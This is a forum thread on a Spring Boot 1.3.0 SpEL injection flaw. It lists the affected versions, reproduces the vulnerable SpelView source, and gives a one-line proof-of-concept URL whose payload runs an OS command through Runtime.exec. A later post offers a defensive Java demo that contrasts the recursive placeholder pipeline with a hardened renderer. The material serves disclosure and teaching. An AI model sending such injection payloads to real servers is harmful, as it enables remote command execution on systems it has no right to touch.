HackerTop - View topic - Spring boot SPEL injection Remote Command Execution
 Spring boot SPEL injection Remote Command Execution 
Affected version

Spring Boot <= 1.3.0

Unaffected version

Spring Boot >= 1.3.1

Reference: https://github.com/spring-projects/spring-boot/issues/4763

The SpelView class in the Spring Boot 1.3.0 source file ErrorMvcAutoConfiguration.java:

Code:

// Excerpt of a nested class from Spring Boot 1.3.0's ErrorMvcAutoConfiguration.java.
// The post omitted the imports and the sibling SpelPlaceholderResolver class; the
// imports below are the ones this excerpt needs.
import java.util.HashMap;
import java.util.Map;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.springframework.context.expression.MapAccessor;
import org.springframework.expression.spel.support.StandardEvaluationContext;
import org.springframework.util.PropertyPlaceholderHelper;
import org.springframework.util.PropertyPlaceholderHelper.PlaceholderResolver;
import org.springframework.web.servlet.View;

private static class SpelView implements View {

      private final String template;

      // Full-power SpEL context: T(...) type references, constructors and any
      // method call are reachable from an expression evaluated against it.
      private final StandardEvaluationContext context = new StandardEvaluationContext();

      private PropertyPlaceholderHelper helper;

      private PlaceholderResolver resolver;

      public SpelView(String template) {
         this.template = template;
         this.context.addPropertyAccessor(new MapAccessor());
         // Resolves ${...} placeholders; PropertyPlaceholderHelper also re-scans
         // every resolved value for further placeholders, so a model value that
         // contains ${...} is not treated as plain data.
         this.helper = new PropertyPlaceholderHelper("${", "}");
         // Each placeholder name is parsed and evaluated as a SpEL expression.
         this.resolver = new SpelPlaceholderResolver(this.context);
      }

      @Override
      public String getContentType() {
         return "text/html";
      }

      @Override
      public void render(Map<String, ?> model, HttpServletRequest request,
            HttpServletResponse response) throws Exception {
         if (response.getContentType() == null) {
            response.setContentType(getContentType());
         }
         Map<String, Object> map = new HashMap<String, Object>(model);
         map.put("path", request.getContextPath());
         // The error model (including the "message" attribute) is the SpEL root.
         this.context.setRootObject(map);
         // A model value containing ${...}, e.g. request input echoed in an
         // exception message, is evaluated as SpEL during this call.
         String result = this.helper.replacePlaceholders(this.template, this.resolver);
         response.getWriter().append(result);
      }

   }


PoC

Code:
http://localhost/xxx?id=${@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ipconfig').getInputStream())}



Patch diff: https://github.com/spring-projects/spring-boot/commit/edb16a13ee33e62b046730a47843cb5dc92054e6


Sun Jul 24, 2016 12:41 pm
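The mechanism behind the PoC, as an added example written for this page (it is not Spring Boot's code and not the linked fix): the same Spring classes SpelView uses are wired up without the servlet layer, so the recursive placeholder pass can be watched directly, beside a hardened renderer. What the post does not spell out is how the request value reaches the template: the whitelabel page renders the model's "message" attribute, and an exception message that echoes request input (a type-conversion failure on a request parameter is the usual case) carries the ${...} text into that value; the model map below is constructed to stand in for that step. Two caveats for anyone reproducing this: the @class@method syntax in the PoC is OGNL, not SpEL, which references a class as T(java.lang.Runtime); and the 1.3.0 SpelPlaceholderResolver (not shown in the excerpt) HTML-escapes each resolved value before the helper re-scans it, so quoted string literals inside a payload are altered by that pass. The example therefore uses a harmless, quote-free expression. It assumes spring-core, spring-context, spring-expression and spring-web on the classpath; SpelViewDemo, evaluate, renderVulnerable and renderHardened are names chosen here.

```java
// Added example, not Spring Boot source: SpelView's placeholder pipeline rebuilt
// without the servlet layer, beside a hardened renderer. Assumes spring-core,
// spring-context, spring-expression and spring-web on the classpath.
import java.util.HashMap;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

import org.springframework.context.expression.MapAccessor;
import org.springframework.expression.EvaluationContext;
import org.springframework.expression.spel.standard.SpelExpressionParser;
import org.springframework.expression.spel.support.SimpleEvaluationContext;
import org.springframework.expression.spel.support.StandardEvaluationContext;
import org.springframework.util.PropertyPlaceholderHelper;
import org.springframework.util.PropertyPlaceholderHelper.PlaceholderResolver;
import org.springframework.web.util.HtmlUtils;

public class SpelViewDemo {

    // The whitelabel template renders the error message through this placeholder.
    static final String TEMPLATE = "<div>${message}</div>";

    private static final SpelExpressionParser PARSER = new SpelExpressionParser();

    // Evaluate one placeholder name as SpEL against the model and HTML-escape the
    // result, as the 1.3.0 SpelPlaceholderResolver does; null leaves it unresolved.
    static String evaluate(String name, EvaluationContext context) {
        try {
            Object value = PARSER.parseExpression(name).getValue(context);
            return value == null ? null : HtmlUtils.htmlEscape(value.toString());
        } catch (Exception ex) {
            return null;
        }
    }

    // Vulnerable path, mirroring SpelView: PropertyPlaceholderHelper re-scans every
    // resolved value for "${...}", and a StandardEvaluationContext lets SpEL reach
    // T(...) type references, constructors and arbitrary method calls.
    static String renderVulnerable(Map<String, Object> model) {
        StandardEvaluationContext context = new StandardEvaluationContext();
        context.addPropertyAccessor(new MapAccessor());
        context.setRootObject(model);
        PropertyPlaceholderHelper helper = new PropertyPlaceholderHelper("${", "}");
        PlaceholderResolver resolver = name -> evaluate(name, context);
        return helper.replacePlaceholders(TEMPLATE, resolver);
    }

    private static final Pattern PLACEHOLDER = Pattern.compile("\\$\\{([^}]+)\\}");

    // Hardened path: (1) a single pass over the template, so a resolved value is
    // inserted literally and never re-parsed; (2) SimpleEvaluationContext with a
    // MapAccessor only: property reads on the model, no T(), no constructors,
    // no bean references, no method invocation.
    static String renderHardened(Map<String, Object> model) {
        EvaluationContext context = SimpleEvaluationContext
                .forPropertyAccessors(new MapAccessor())
                .withRootObject(model)
                .build();
        Matcher m = PLACEHOLDER.matcher(TEMPLATE);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            String value = evaluate(m.group(1), context);
            String literal = value == null ? m.group(0) : value;
            m.appendReplacement(out, Matcher.quoteReplacement(literal));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed stand-in for request input echoed into the error message.
        String requestValue = "${T(java.lang.Runtime).getRuntime().availableProcessors()}";
        Map<String, Object> model = new HashMap<>();
        model.put("message", "Bad value: " + requestValue);

        // The expression ran: the div shows the processor count, not the input.
        System.out.println(renderVulnerable(model));
        // The input comes back as text; the ${...} inside it was never evaluated.
        System.out.println(renderHardened(model));
    }
}
```

Run main with the Spring jars on the classpath: the first line prints a number inside the div, the second prints the input text unchanged. The linked commit addresses the first of the two hardening points (placeholder recursion); the restricted evaluation context is the extra measure for any code that evaluates SpEL over values it does not control.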

follow lyon come here
:)


Tue Aug 09, 2016 8:55 am